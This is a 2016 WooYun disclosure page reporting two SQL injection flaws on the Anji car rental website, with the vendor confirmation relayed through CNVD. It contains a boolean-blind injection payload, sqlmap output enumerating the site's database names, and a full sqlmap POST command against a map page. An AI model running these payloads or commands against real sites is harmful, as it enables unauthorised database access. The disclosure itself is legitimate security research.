安吉汽车租赁主站存在两处sql注入 | wooyun-2016-0168412| WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞标题：安吉汽车租赁主站存在两处sql注入

提交时间：2016-01-11 18:26

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-11：细节已通知厂商并且等待厂商处理中
2016-01-15：厂商已经确认，细节仅向厂商公开
2016-01-25：细节向核心白帽子及相关领域专家公开
2016-02-04：细节向普通白帽子公开
2016-02-14：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

我为首现而来

详细说明：

第一次http://**.**.**.**/Web/RentalNoticeDetail.aspxCountryCode=AU&CountryName=Australia
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/Web/RentalNoticeDetail.aspx?CountryCode=AU' AND 3737=3737 AND 'KGts'='KGts&CountryName=Australia
---
[14:42:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[14:42:43] [INFO] fetching database names
[14:42:43] [INFO] fetching number of databases
[14:42:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:42:43] [INFO] retrieved:
[14:42:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:42:44] [ERROR] unable to retrieve the number of databases
[14:42:44] [INFO] resumed: AvisOutBound
[14:42:44] [INFO] resumed: master
[14:42:44] [INFO] resumed: tempdb
[14:42:44] [INFO] resumed: model
[14:42:44] [INFO] resumed: msdb
[14:42:44] [INFO] resumed: Anji_eBiz
[14:42:44] [INFO] resumed: Anji_eBiz_UAT
[14:42:44] [INFO] resumed: AvisOutBound
[14:42:44] [INFO] resumed: Anji_eBiz_Inte
[14:42:44] [INFO] resumed: AnjiInt_DB
[14:42:44] [INFO] resumed: Anji_eBiz_Help
[14:42:44] [INFO] resumed: AvisCRM
[14:42:44] [INFO] resumed: Anji_eBiz150101
[14:42:44] [INFO] resumed: AvisOutBound_MobileTest
[14:42:44] [INFO] resumed:
available databases [13]:
[*] Anji_eBiz
[*] Anji_eBiz150101
[*] Anji_eBiz_Help
[*] Anji_eBiz_Inte
[*] Anji_eBiz_UAT
[*] AnjiInt_DB
[*] AvisCRM
[*] AvisOutBound
[*] AvisOutBound_MobileTest
[*] master
[*] model
[*] msdb
[*] tempdb
第二处post注入

sqlmap -u "http://**.**.**.**/map.html?ID=8&CityName=310100" --data "__VIEWSTATE=%2FwEPDwUKMjExNjM5NzE5Mw8WBB4IQ2l0eU5hbWUFBjMxMDEwMB4KdG90YWxDb3VudAUCMjUWAgIBEGRkFgZmDw8WAh4JRnRwVXJsUGFyZWQWAmYPZBYCAgEPFgIeB1Zpc2libGVoFgJmDw8WAh4EVGV4dGVkZAIKDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIKZBYCZg9kFhYCAQ9kFgJmD2QWAmYPFQUBOBXkuIrmtbfkuK3lsbHlhazlm63lupcLMDg6MDB%2BMjA6MDAh5LiK5rW35biC6ZW%2F5a6B5Yy65Yev5peL6LevNDQ45Y%2B3DDAyMS02MjQxMDIxNWQCAg9kFgJmD2QWAmYPFQUCMTAS5LiK5rW35byg5p2o6Lev5bqXCzA4OjAwfjIwOjAwJeS4iua1t%2BW4gua1puS4nOaWsOWMuuW8oOadqOi3rzI5NzTlj7cMMDIxLTU4MzM1NzU5ZAIDD2QWAmYPZBYCZg8VBQIxMhXkuIrmtbfmtabkuJzmnLrlnLrlupcLMDg6MzB%2BMjI6MDA55LiK5rW35rWm5Lic5Zu96ZmF5py65Zy65YCZ5py65qW85LqU5rSy5Lit6Lev6L%2BR56OB5oKs5rWuDDAyMS02ODM0NjY2OGQCBA9kFgJmD2QWAmYPFQUCMTQS5LiK5rW354Gr6L2m56uZ5bqXCzA4OjAwfjIwOjAwauS4iua1t%2BW4gumXuOWMl%2BWMuuWkp%2Be7n%2Bi3rzc2MOWPt%2B%2B8iOi%2FkeawuOWFtOi3r%2B%2B8ieS4iua1t%2BeBq%2Bi9puermeWMl%2BW5v%2BWcuuekvuS8mui9pui%2BhuWBnOi9puW6k%2BWcsOS4izLlsYIMMDIxLTY2MDc2NTAxZAIFD2QWAmYPZBYCZg8VBQMxMDcY5LiK5rW35aSn5p%2BP5qCR5L6%2F5o235bqXCzA4OjMwfjE3OjAwOuS4iua1t%2BW4gumXuOWMl%2BWMuuWQiea1pui3rzPlj7fvvIjlronlkInkuJPkuJrnu7Tkv67lhoXvvIkMMDIxLTY1NjE0Njc4ZAIGD2QWAmYPZBYCZg8VBQMxMTch5LiK5rW36buE5bi95a2Q5ZC05Lit6Lev5L6%2F5o235bqXCzA5OjAwfjE3OjAwIeS4iua1t%2BW4gumXteihjOWMuuWQtOS4rei3rzUwMOWPtxAwMjEtNTE1MDAxNjgqMTA2ZAIHD2QWAmYPZBYCZg8VBQMyMDAS5LiK5rW35b6Q5a625rGH5bqXCzA4OjAwfjIwOjAwK%2BS4nOWuiei3rzIzMS0yMznlj7fvvIjmsb3ovabnlJ%2FmtLvlub%2FlnLrvvIkMMDIxLTY0MDM4MzE1ZAIID2QWAmYPZBYCZg8VBQMyNDQV5LiK5rW36Jm55qGl5py65Zy65bqXCzA4OjAwfjIwOjAwHuS4iua1t%2BmVv%2BWugeWMuue7peWugei3rzYyOOWPtwwwMjEtNjA3MDg2MDBkAgkPZBYCZg9kFgJmDxUFAzI2OB7kuIrmtbfph5HmoaXok53lpKnot6%2Fkvr%2FmjbflupcLMDg6MzB%2BMTk6MzAz5LiK5rW35biC5rWm5Lic5paw5Yy66JOd5aSp6LevNjAw5Y%2B35LiA5Y%2B35YGc6L2m5Zy6DDAyMS01ODMzNTc1OWQCCg9kFgJmD2QWAmYPFQUDMjczGOS4iua1t%2BmHkemSn%2Bi3r%2BS%2Bv%2BaNt%2BW6lwswODowMH4yMDowMFzkuIrmtbfluILplb%2FlroHljLrph5Hpkp%2Fot682MzHlj7flhazkuqQ4Nzbot6%2FosIPluqblrqTvvIjlnLDpk4Ey5Y%2B357q%2F5ree6Jm56LevNeWPt%2BWHuuWPo%2B%2B8iQwwMjEtNTI2NTc2ODNkAgsPDxYCHwNoZGQCCw88KwANAQAPFgQfBWcfBgIPZBYCZg9kFiACAQ9kFgJmD2QWAmYPFQUHNDkyXlM2WhjkuIrmtbfombnmoaXpq5jpk4Hnq5nngrkLMDg6MDB%2BMjA6MDA05LiK5rW36Jm55qGl6auY6ZOB56uZ54K56Jm55qGl6auY6ZOB56uZ5Ye65Y%2BRN%2BWPt%2BWPowwwMjEtNjA3MDg2MDBkAgIPZBYCZg9kFgJmDxUFBzQ5NF5TN0Ie5LiK5rW35rWm5Lic5paw5Yy65YWr5L2w5Ly054K5CzA4OjAwfjIwOjAwaeS4iua1t%2Ba1puS4nOaWsOWMuuWFq%2BS9sOS8tOeCueW8oOadqOi3rzcwN%2BWPt%2BWkquW5s%2Ba0i%2BaVsOeggeW5v%2BWcuuWBnOi9puWcuu%2B8iOaxpOiHo%2Ba0sumZheWkp%2BmFkuW6l%2BaXge%2B8iQwwMjEtNjA3MDg2MDBkAgMPZBYCZg9kFgJmDxUFBzQ5Nl5TN00e5LiK5rW35rWm5Lic5paw5Yy66b6Z6Ziz6Lev54K5CzA4OjAwfjIwOjAwV%2BS4iua1t%2Ba1puS4nOaWsOWMuum%2BmemYs%2Bi3r%2BeCuem%2BmemYs%2BejgeaCrOa1rui9qOmBk%2BermeWBnOi9puWcuu%2B8jOm%2Bmeaxh%2Bi3r%2Bi%2FkeeZveadqOi3rwwwMjEtNjA3MDg2MDBkAgQPZBYCZg9kFgJmDxUFBzQ5N15TN0Yb5LiK5rW36Z2Z5a6J5Yy66Z2Z5a6J5a%2B654K5CzA4OjAwfjIwOjAwSOS4iua1t%2BmdmeWuieWMuumdmeWuieWvuueCueW4uOW%2Bt%2Bi3r%2BmTnOS7gei3r%2B%2B8iOaEmuWbreS4nOi3r%2BWBnOi9puWcuu%2B8iQwwMjEtNjA3MDg2MDBkAgUPZBYCZg9kFgJmDxUFBzQ5OF5TN1kY5LiK5rW35a6d5bGx5Yy65aSn5Y2O54K5CzA4OjAwfjIwOjAwb%2BS4iua1t%2BWuneWxseWMuuWkp%2BWNjueCueecn%2BWNjui3r%2BmprOi3r%2BWBnOi9puWcuu%2B8iOWNjueBtei3r%2BOAgeWkp%2BWNjuS4iei3r%2BS4remXtOOAgeenpuajruS8kemXsuW5v%2BWcuuWvuemdou%2B8iQwwMjEtNjA3MDg2MDBkAgYPZBYCZg9kFgJmDxUFBzUwMF5BNlYm5LiK5rW36Jm55qGl5py65Zy6VDLoiKrnq5nmpbzmnI3liqHngrkLMDg6MDB%2BMjE6MDBK5LiK5rW36Jm55qGl5py65Zy6VDLoiKrnq5nmpbzmnI3liqHngrnombnmoaXmnLrlnLpUMuiIquermealvOWHuuWPkTflj7flj6MMMDIxLTYwNzA4NjAwZAIHD2QWAmYPZBYCZg8VBQc1MDFeQzRWJuS4iua1t%2BiZueahpeacuuWculQx6Iiq56uZ5qW85pyN5Yqh54K5CzA4OjAwfjIxOjAwSuS4iua1t%2BiZueahpeacuuWculQx6Iiq56uZ5qW85pyN5Yqh54K56Jm55qGl5py65Zy6VDHoiKrnq5nmpbzlh7rlj5E25Y%2B35Y%2BjDDAyMS02MDcwODYwMGQCCA9kFgJmD2QWAmYPFQUHNTAyXkM0RxvkuIrmtbfmnajmtabljLrkupTop5LlnLrngrkLMDg6MDB%2BMjA6MDBm5LiK5rW35p2o5rWm5Yy65LqU6KeS5Zy654K55pS%2F5pem5Lic6Lev44CB6L%2BR5Zu95ZKM6Lev5Y%2Bj6ams6Lev5YGc6L2m5Zy677yI5Yev6L%2Bq6YeR6J6N5aSn5Y6m5a%2B56Z2i77yJDDAyMS02MDcwODYwMGQCCQ9kFgJmD2QWAmYPFQUHNTA0Xkg5MxvkuIrmtbfpu4TmtabljLrmlrDlpKnlnLDngrkLMDg6MDB%2BMjA6MDBL5LiK5rW36buE5rWm5Yy65paw5aSp5Zyw54K55paw5aSp5Zyw6Ieq5b%2Bg6Lev77yM5aSq5bmz5qGl6Iqx5Zut5peB5YGc6L2m5Zy6DDAyMS02MDcwODYwMGQCCg9kFgJmD2QWAmYPFQUHNTA1Xkg5MhvkuIrmtbflvpDmsYfljLrkuIfkvZPppobngrkLMDg6MDB%2BMjA6MDBW5LiK5rW35b6Q5rGH5Yy65LiH5L2T6aaG54K55YWr5LiH5Lq65L2T6IKy5Zy65LiJ5Y%2B35YGc6L2m5Zy6LOS7jumbtumZtei3rzflj7fpl6jov5vlhaUMMDIxLTYwNzA4NjAwZAILD2QWAmYPZBYCZg8VBQc1MDdeUzNBKumUpuaxn%2BS5i%2BaYn%2BS4iua1t%2BWFseWSjOaWsOi3r%2BW6l%2BacjeWKoeeCuQswOTozMH4xNzowMD3plKbmsZ%2FkuYvmmJ%2FkuIrmtbflhbHlkozmlrDot6%2FlupfmnI3liqHngrnlhbHlkozmlrDot68xNDE45Y%2B3DDAyMS02MDcwODYwMGQCDA9kFgJmD2QWAmYPFQUHNTA5XlM2UTDplKbmsZ%2FkuYvmmJ%2FkuIrmtbflhYnlpKfkvJrlsZXkuK3lv4PlupfmnI3liqHngrkLMDk6MzB%2BMTc6MDBI6ZSm5rGf5LmL5pif5LiK5rW35YWJ5aSn5Lya5bGV5Lit5b%2BD5bqX5pyN5Yqh54K55b6Q5rGH5Yy65ryV5a6d6LevNDQw5Y%2B3DDAyMS02MDcwODYwMGQCDQ9kFgJmD2QWAmYPFQUHNTExXlM2TSTplKbmsZ%2FkuYvmmJ%2FkuIrmtbfoirHmnKjlupfmnI3liqHngrkLMDk6MzB%2BMTc6MDA06ZSm5rGf5LmL5pif5LiK5rW36Iqx5pyo5bqX5pyN5Yqh54K55rWm5bu66LevMTEyMeWPtwwwMjEtNjA3MDg2MDBkAg4PZBYCZg9kFgJmDxUFBzUxM15TNkok6ZSm5rGf5LmL5pif5LiK5rW36I6Y5bqE5bqX5pyN5Yqh54K5CzA5OjMwfjE3OjAwPumUpuaxn%2BS5i%2BaYn%2BS4iua1t%2BiOmOW6hOW6l%2BacjeWKoeeCuemXteihjOWMuuawtOa4heWNl%2Bi3rzE55Y%2B3DDAyMS02MDcwODYwMGQCDw9kFgJmD2QWAmYPFQUHNTE1XlM2TiTplKbmsZ%2FkuYvmmJ%2FplKbmsZ%2FkuZDlm63lupfmnI3liqHngrkLMDk6MzB%2BMTc6MDA86ZSm5rGf5LmL5pif6ZSm5rGf5LmQ5Zut5bqX5pyN5Yqh54K56Ze16KGM5Yy66Jm55qKF6LevMjI35Y%2B3DDAyMS02MDcwODYwMGQCEA8PFgIfA2hkZBgCBQxHVlNlcml2ZVNpdGUPPCsACgEIAgFkBQhHVlN0b3Jlcw88KwAKAQgCAWQD88r4HyvpSmui%2FFL0lNYxVcIIrA%3D%3D&__VIEWSTATEGENERATOR=997E8D66&__EVENTVALIDATION=%2FwEWDALFk4z7DQLTpY8oArvYo%2BcLAozKmt0PAo6Xpp4EAqWf8%2B4KAt3Ah7YIAqagsfIIAqnztpkIAuiZpNQGAoH34%2FENAoj3l%2FENpncvCwVyT3nnLQ%2BO4yzPfuP1COI%3D&txtOfferCityCode=310100&txtOfferShopName=%E4%B8%8A%E6%B5%B7%E4%B8%AD%E5%B1%B1%E5%85%AC%E5%9B%AD%E5%BA%97&txtOfferShopCode=8&btnSearch=88952634&txtBeginTime=88952634&jsOfferTime=%7Bopentime%3A&txtEndTime=88952634&jsReturnTime=%7Bopentime%3A&hidShopLng=88952634&hidShopLat=88952634&txtOfferCityName=%E4%B8%8A%E6%B5%B7%E5%B8%82"

由于时间问题，就不跑数据了，证明漏洞存在即可

漏洞证明：

sqlmap -u "http://**.**.**.**/map.html?ID=8&CityName=310100" --data "__VIEWSTATE=%2FwEPDwUKMjExNjM5NzE5Mw8WBB4IQ2l0eU5hbWUFBjMxMDEwMB4KdG90YWxDb3VudAUCMjUWAgIBEGRkFgZmDw8WAh4JRnRwVXJsUGFyZWQWAmYPZBYCAgEPFgIeB1Zpc2libGVoFgJmDw8WAh4EVGV4dGVkZAIKDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIKZBYCZg9kFhYCAQ9kFgJmD2QWAmYPFQUBOBXkuIrmtbfkuK3lsbHlhazlm63lupcLMDg6MDB%2BMjA6MDAh5LiK5rW35biC6ZW%2F5a6B5Yy65Yev5peL6LevNDQ45Y%2B3DDAyMS02MjQxMDIxNWQCAg9kFgJmD2QWAmYPFQUCMTAS5LiK5rW35byg5p2o6Lev5bqXCzA4OjAwfjIwOjAwJeS4iua1t%2BW4gua1puS4nOaWsOWMuuW8oOadqOi3rzI5NzTlj7cMMDIxLTU4MzM1NzU5ZAIDD2QWAmYPZBYCZg8VBQIxMhXkuIrmtbfmtabkuJzmnLrlnLrlupcLMDg6MzB%2BMjI6MDA55LiK5rW35rWm5Lic5Zu96ZmF5py65Zy65YCZ5py65qW85LqU5rSy5Lit6Lev6L%2BR56OB5oKs5rWuDDAyMS02ODM0NjY2OGQCBA9kFgJmD2QWAmYPFQUCMTQS5LiK5rW354Gr6L2m56uZ5bqXCzA4OjAwfjIwOjAwauS4iua1t%2BW4gumXuOWMl%2BWMuuWkp%2Be7n%2Bi3rzc2MOWPt%2B%2B8iOi%2FkeawuOWFtOi3r%2B%2B8ieS4iua1t%2BeBq%2Bi9puermeWMl%2BW5v%2BWcuuekvuS8mui9pui%2BhuWBnOi9puW6k%2BWcsOS4izLlsYIMMDIxLTY2MDc2NTAxZAIFD2QWAmYPZBYCZg8VBQMxMDcY5LiK5rW35aSn5p%2BP5qCR5L6%2F5o235bqXCzA4OjMwfjE3OjAwOuS4iua1t%2BW4gumXuOWMl%2BWMuuWQiea1pui3rzPlj7fvvIjlronlkInkuJPkuJrnu7Tkv67lhoXvvIkMMDIxLTY1NjE0Njc4ZAIGD2QWAmYPZBYCZg8VBQMxMTch5LiK5rW36buE5bi95a2Q5ZC05Lit6Lev5L6%2F5o235bqXCzA5OjAwfjE3OjAwIeS4iua1t%2BW4gumXteihjOWMuuWQtOS4rei3rzUwMOWPtxAwMjEtNTE1MDAxNjgqMTA2ZAIHD2QWAmYPZBYCZg8VBQMyMDAS5LiK5rW35b6Q5a625rGH5bqXCzA4OjAwfjIwOjAwK%2BS4nOWuiei3rzIzMS0yMznlj7fvvIjmsb3ovabnlJ%2FmtLvlub%2FlnLrvvIkMMDIxLTY0MDM4MzE1ZAIID2QWAmYPZBYCZg8VBQMyNDQV5LiK5rW36Jm55qGl5py65Zy65bqXCzA4OjAwfjIwOjAwHuS4iua1t%2BmVv%2BWugeWMuue7peWugei3rzYyOOWPtwwwMjEtNjA3MDg2MDBkAgkPZBYCZg9kFgJmDxUFAzI2OB7kuIrmtbfph5HmoaXok53lpKnot6%2Fkvr%2FmjbflupcLMDg6MzB%2BMTk6MzAz5LiK5rW35biC5rWm5Lic5paw5Yy66JOd5aSp6LevNjAw5Y%2B35LiA5Y%2B35YGc6L2m5Zy6DDAyMS01ODMzNTc1OWQCCg9kFgJmD2QWAmYPFQUDMjczGOS4iua1t%2BmHkemSn%2Bi3r%2BS%2Bv%2BaNt%2BW6lwswODowMH4yMDowMFzkuIrmtbfluILplb%2FlroHljLrph5Hpkp%2Fot682MzHlj7flhazkuqQ4Nzbot6%2FosIPluqblrqTvvIjlnLDpk4Ey5Y%2B357q%2F5ree6Jm56LevNeWPt%2BWHuuWPo%2B%2B8iQwwMjEtNTI2NTc2ODNkAgsPDxYCHwNoZGQCCw88KwANAQAPFgQfBWcfBgIPZBYCZg9kFiACAQ9kFgJmD2QWAmYPFQUHNDkyXlM2WhjkuIrmtbfombnmoaXpq5jpk4Hnq5nngrkLMDg6MDB%2BMjA6MDA05LiK5rW36Jm55qGl6auY6ZOB56uZ54K56Jm55qGl6auY6ZOB56uZ5Ye65Y%2BRN%2BWPt%2BWPowwwMjEtNjA3MDg2MDBkAgIPZBYCZg9kFgJmDxUFBzQ5NF5TN0Ie5LiK5rW35rWm5Lic5paw5Yy65YWr5L2w5Ly054K5CzA4OjAwfjIwOjAwaeS4iua1t%2Ba1puS4nOaWsOWMuuWFq%2BS9sOS8tOeCueW8oOadqOi3rzcwN%2BWPt%2BWkquW5s%2Ba0i%2BaVsOeggeW5v%2BWcuuWBnOi9puWcuu%2B8iOaxpOiHo%2Ba0sumZheWkp%2BmFkuW6l%2BaXge%2B8iQwwMjEtNjA3MDg2MDBkAgMPZBYCZg9kFgJmDxUFBzQ5Nl5TN00e5LiK5rW35rWm5Lic5paw5Yy66b6Z6Ziz6Lev54K5CzA4OjAwfjIwOjAwV%2BS4iua1t%2Ba1puS4nOaWsOWMuum%2BmemYs%2Bi3r%2BeCuem%2BmemYs%2BejgeaCrOa1rui9qOmBk%2BermeWBnOi9puWcuu%2B8jOm%2Bmeaxh%2Bi3r%2Bi%2FkeeZveadqOi3rwwwMjEtNjA3MDg2MDBkAgQPZBYCZg9kFgJmDxUFBzQ5N15TN0Yb5LiK5rW36Z2Z5a6J5Yy66Z2Z5a6J5a%2B654K5CzA4OjAwfjIwOjAwSOS4iua1t%2BmdmeWuieWMuumdmeWuieWvuueCueW4uOW%2Bt%2Bi3r%2BmTnOS7gei3r%2B%2B8iOaEmuWbreS4nOi3r%2BWBnOi9puWcuu%2B8iQwwMjEtNjA3MDg2MDBkAgUPZBYCZg9kFgJmDxUFBzQ5OF5TN1kY5LiK5rW35a6d5bGx5Yy65aSn5Y2O54K5CzA4OjAwfjIwOjAwb%2BS4iua1t%2BWuneWxseWMuuWkp%2BWNjueCueecn%2BWNjui3r%2BmprOi3r%2BWBnOi9puWcuu%2B8iOWNjueBtei3r%2BOAgeWkp%2BWNjuS4iei3r%2BS4remXtOOAgeenpuajruS8kemXsuW5v%2BWcuuWvuemdou%2B8iQwwMjEtNjA3MDg2MDBkAgYPZBYCZg9kFgJmDxUFBzUwMF5BNlYm5LiK5rW36Jm55qGl5py65Zy6VDLoiKrnq5nmpbzmnI3liqHngrkLMDg6MDB%2BMjE6MDBK5LiK5rW36Jm55qGl5py65Zy6VDLoiKrnq5nmpbzmnI3liqHngrnombnmoaXmnLrlnLpUMuiIquermealvOWHuuWPkTflj7flj6MMMDIxLTYwNzA4NjAwZAIHD2QWAmYPZBYCZg8VBQc1MDFeQzRWJuS4iua1t%2BiZueahpeacuuWculQx6Iiq56uZ5qW85pyN5Yqh54K5CzA4OjAwfjIxOjAwSuS4iua1t%2BiZueahpeacuuWculQx6Iiq56uZ5qW85pyN5Yqh54K56Jm55qGl5py65Zy6VDHoiKrnq5nmpbzlh7rlj5E25Y%2B35Y%2BjDDAyMS02MDcwODYwMGQCCA9kFgJmD2QWAmYPFQUHNTAyXkM0RxvkuIrmtbfmnajmtabljLrkupTop5LlnLrngrkLMDg6MDB%2BMjA6MDBm5LiK5rW35p2o5rWm5Yy65LqU6KeS5Zy654K55pS%2F5pem5Lic6Lev44CB6L%2BR5Zu95ZKM6Lev5Y%2Bj6ams6Lev5YGc6L2m5Zy677yI5Yev6L%2Bq6YeR6J6N5aSn5Y6m5a%2B56Z2i77yJDDAyMS02MDcwODYwMGQCCQ9kFgJmD2QWAmYPFQUHNTA0Xkg5MxvkuIrmtbfpu4TmtabljLrmlrDlpKnlnLDngrkLMDg6MDB%2BMjA6MDBL5LiK5rW36buE5rWm5Yy65paw5aSp5Zyw54K55paw5aSp5Zyw6Ieq5b%2Bg6Lev77yM5aSq5bmz5qGl6Iqx5Zut5peB5YGc6L2m5Zy6DDAyMS02MDcwODYwMGQCCg9kFgJmD2QWAmYPFQUHNTA1Xkg5MhvkuIrmtbflvpDmsYfljLrkuIfkvZPppobngrkLMDg6MDB%2BMjA6MDBW5LiK5rW35b6Q5rGH5Yy65LiH5L2T6aaG54K55YWr5LiH5Lq65L2T6IKy5Zy65LiJ5Y%2B35YGc6L2m5Zy6LOS7jumbtumZtei3rzflj7fpl6jov5vlhaUMMDIxLTYwNzA4NjAwZAILD2QWAmYPZBYCZg8VBQc1MDdeUzNBKumUpuaxn%2BS5i%2BaYn%2BS4iua1t%2BWFseWSjOaWsOi3r%2BW6l%2BacjeWKoeeCuQswOTozMH4xNzowMD3plKbmsZ%2FkuYvmmJ%2FkuIrmtbflhbHlkozmlrDot6%2FlupfmnI3liqHngrnlhbHlkozmlrDot68xNDE45Y%2B3DDAyMS02MDcwODYwMGQCDA9kFgJmD2QWAmYPFQUHNTA5XlM2UTDplKbmsZ%2FkuYvmmJ%2FkuIrmtbflhYnlpKfkvJrlsZXkuK3lv4PlupfmnI3liqHngrkLMDk6MzB%2BMTc6MDBI6ZSm5rGf5LmL5pif5LiK5rW35YWJ5aSn5Lya5bGV5Lit5b%2BD5bqX5pyN5Yqh54K55b6Q5rGH5Yy65ryV5a6d6LevNDQw5Y%2B3DDAyMS02MDcwODYwMGQCDQ9kFgJmD2QWAmYPFQUHNTExXlM2TSTplKbmsZ%2FkuYvmmJ%2FkuIrmtbfoirHmnKjlupfmnI3liqHngrkLMDk6MzB%2BMTc6MDA06ZSm5rGf5LmL5pif5LiK5rW36Iqx5pyo5bqX5pyN5Yqh54K55rWm5bu66LevMTEyMeWPtwwwMjEtNjA3MDg2MDBkAg4PZBYCZg9kFgJmDxUFBzUxM15TNkok6ZSm5rGf5LmL5pif5LiK5rW36I6Y5bqE5bqX5pyN5Yqh54K5CzA5OjMwfjE3OjAwPumUpuaxn%2BS5i%2BaYn%2BS4iua1t%2BiOmOW6hOW6l%2BacjeWKoeeCuemXteihjOWMuuawtOa4heWNl%2Bi3rzE55Y%2B3DDAyMS02MDcwODYwMGQCDw9kFgJmD2QWAmYPFQUHNTE1XlM2TiTplKbmsZ%2FkuYvmmJ%2FplKbmsZ%2FkuZDlm63lupfmnI3liqHngrkLMDk6MzB%2BMTc6MDA86ZSm5rGf5LmL5pif6ZSm5rGf5LmQ5Zut5bqX5pyN5Yqh54K56Ze16KGM5Yy66Jm55qKF6LevMjI35Y%2B3DDAyMS02MDcwODYwMGQCEA8PFgIfA2hkZBgCBQxHVlNlcml2ZVNpdGUPPCsACgEIAgFkBQhHVlN0b3Jlcw88KwAKAQgCAWQD88r4HyvpSmui%2FFL0lNYxVcIIrA%3D%3D&__VIEWSTATEGENERATOR=997E8D66&__EVENTVALIDATION=%2FwEWDALFk4z7DQLTpY8oArvYo%2BcLAozKmt0PAo6Xpp4EAqWf8%2B4KAt3Ah7YIAqagsfIIAqnztpkIAuiZpNQGAoH34%2FENAoj3l%2FENpncvCwVyT3nnLQ%2BO4yzPfuP1COI%3D&txtOfferCityCode=310100&txtOfferShopName=%E4%B8%8A%E6%B5%B7%E4%B8%AD%E5%B1%B1%E5%85%AC%E5%9B%AD%E5%BA%97&txtOfferShopCode=8&btnSearch=88952634&txtBeginTime=88952634&jsOfferTime=%7Bopentime%3A&txtEndTime=88952634&jsReturnTime=%7Bopentime%3A&hidShopLng=88952634&hidShopLat=88952634&txtOfferCityName=%E4%B8%8A%E6%B5%B7%E5%B8%82"

由于时间问题，就不跑数据了，证明漏洞存在即可

修复方案：

版权声明：转载请注明来源头晕脑壳疼@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-01-15 15:55

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168412

漏洞标题：安吉汽车租赁主站存在两处sql注入

相关厂商：安吉汽车租赁有限公司

漏洞作者：头晕脑壳疼

提交时间：2016-01-11 18:26

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源头晕脑壳疼@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168412

漏洞标题：安吉汽车租赁主站存在两处sql注入

相关厂商：安吉汽车租赁有限公司

漏洞作者： 头晕脑壳疼

提交时间：2016-01-11 18:26

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0168412"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 头晕脑壳疼@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：头晕脑壳疼

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源头晕脑壳疼@乌云